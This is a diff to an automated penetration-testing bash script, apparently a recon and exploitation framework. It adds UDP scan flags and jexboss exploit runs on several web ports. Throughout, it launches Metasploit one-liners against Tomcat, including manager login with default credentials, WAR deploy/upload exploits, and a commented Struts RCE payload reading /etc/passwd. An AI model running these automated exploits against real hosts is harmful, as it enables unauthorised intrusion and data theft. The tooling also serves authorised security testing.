|
|
|
|
@@ -234,7 +234,7 @@ if [ "$MODE" = "stealth" ]; then
|
|
|
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET"
|
|
|
|
|
nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1524,2049,2121,3306,3310,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152 $TARGET -oX $LOOT_DIR/nmap-$TARGET.xml
|
|
|
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET"
|
|
|
|
|
nmap -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET
|
|
|
|
|
nmap -sU -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET
|
|
|
|
|
echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET"
|
|
|
|
|
wafw00f http://$TARGET
|
|
|
|
|
wafw00f https://$TARGET
|
|
|
|
|
@@ -331,7 +331,7 @@ if [ "$MODE" = "airstrike" ]; then
|
|
|
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET"
|
|
|
|
|
nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1524,2049,2121,3306,3310,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152 $a -oX $LOOT_DIR/nmap-$a.xml
|
|
|
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET"
|
|
|
|
|
nmap -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $a
|
|
|
|
|
nmap -sU -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $a
|
|
|
|
|
echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET"
|
|
|
|
|
wafw00f http://$a
|
|
|
|
|
wafw00f https://$a
|
|
|
|
|
@@ -458,7 +458,7 @@ echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=----
|
|
|
|
|
if [ -z "$OPT1" ]; then
|
|
|
|
|
nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1524,2049,2121,3306,3310,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152 $TARGET -oX $LOOT_DIR/nmap-$TARGET.xml
|
|
|
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET"
|
|
|
|
|
nmap -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET
|
|
|
|
|
nmap -sU -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET
|
|
|
|
|
elif [ "$OPT1" == "web" ]; then
|
|
|
|
|
nmap -sV -T5 -p 80,443 --open $TARGET -oX $LOOT_DIR/nmap-$TARGET.xml
|
|
|
|
|
else
|
|
|
|
|
@@ -555,7 +555,7 @@ then
|
|
|
|
|
echo -e "$OKRED + -- --=[Port 53 closed... skipping.$RESET"
|
|
|
|
|
else
|
|
|
|
|
echo -e "$OKORANGE + -- --=[Port 53 opened... running tests...$RESET"
|
|
|
|
|
nmap -sV -T5 --script=dns* -p U:53,T:53 $TARGET
|
|
|
|
|
nmap -sU -sV -T5 --script=dns* -p U:53,T:53 $TARGET
|
|
|
|
|
fi
|
|
|
|
|
|
|
|
|
|
if [ -z "$port_79" ];
|
|
|
|
|
@@ -996,6 +996,8 @@ else
|
|
|
|
|
cd ..
|
|
|
|
|
nikto -h http://$TARGET:8000
|
|
|
|
|
cutycapt --url=http://$TARGET:8000 --out=loot/$TARGET-port8000.jpg
|
|
|
|
|
python jexboss/jexboss.py -host http://$TARGET:8000
|
|
|
|
|
|
|
|
|
|
fi
|
|
|
|
|
|
|
|
|
|
if [ -z "$port_8100" ];
|
|
|
|
|
@@ -1014,6 +1016,7 @@ else
|
|
|
|
|
cd ..
|
|
|
|
|
nikto -h http://$TARGET:8100
|
|
|
|
|
cutycapt --url=http://$TARGET:8100 --out=loot/$TARGET-port8100.jpg
|
|
|
|
|
python jexboss/jexboss.py -host http://$TARGET:8100
|
|
|
|
|
fi
|
|
|
|
|
|
|
|
|
|
if [ -z "$port_8080" ];
|
|
|
|
|
@@ -1036,8 +1039,9 @@ else
|
|
|
|
|
msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8080; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
|
|
|
|
|
# EXPERIMENTAL - APACHE STRUTS RCE EXPLOIT
|
|
|
|
|
# msfconsole -x "use exploit/linux/http/apache_struts_rce_2016-3081; setg RHOSTS "$TARGET"; set PAYLOAD linux/x86/read_file; set PATH /etc/passwd; run;"
|
|
|
|
|
python jexboss/jexboss.py http://$TARGET:8080
|
|
|
|
|
python jexboss/jexboss.py https://$TARGET:8080
|
|
|
|
|
python jexboss/jexboss.py -host http://$TARGET:8080
|
|
|
|
|
python jexboss/jexboss.py -host https://$TARGET:8080
|
|
|
|
|
|
|
|
|
|
fi
|
|
|
|
|
|
|
|
|
|
if [ -z "$port_8180" ];
|
|
|
|
|
@@ -1061,6 +1065,7 @@ else
|
|
|
|
|
echo -e "$OKGREEN + -- ----------------------------=[Launching Webmin File Disclosure Exploit]= -- +$RESET"
|
|
|
|
|
echo -e "$OKGREEN + -- ----------------------------=[Launching Tomcat Exploits]=--------------- -- +$RESET"
|
|
|
|
|
msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8180; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
|
|
|
|
|
python jexboss/jexboss.py -host http://$TARGET:8180
|
|
|
|
|
fi
|
|
|
|
|
|
|
|
|
|
if [ -z "$port_8443" ];
|
|
|
|
|
@@ -1081,6 +1086,7 @@ else
|
|
|
|
|
nikto -h https://$TARGET:8443
|
|
|
|
|
cutycapt --url=https://$TARGET:8443 --out=loot/$TARGET-port8443.jpg
|
|
|
|
|
nmap -p 8443 -T5 --script=*proxy* $TARGET
|
|
|
|
|
python jexboss/jexboss.py -host https://$TARGET:8443
|
|
|
|
|
fi
|
|
|
|
|
|
|
|
|
|
if [ -z "$port_8888" ];
|
|
|
|
|
@@ -1095,6 +1101,7 @@ else
|
|
|
|
|
xsstracer $TARGET 8888
|
|
|
|
|
nikto -h http://$TARGET:8888
|
|
|
|
|
cutycapt --url=https://$TARGET:8888 --out=loot/$TARGET-port8888.jpg
|
|
|
|
|
python jexboss/jexboss.py -host http://$TARGET:8888
|
|
|
|
|
fi
|
|
|
|
|
|
|
|
|
|
if [ -z "$port_10000" ];
|
|
|
|
|
|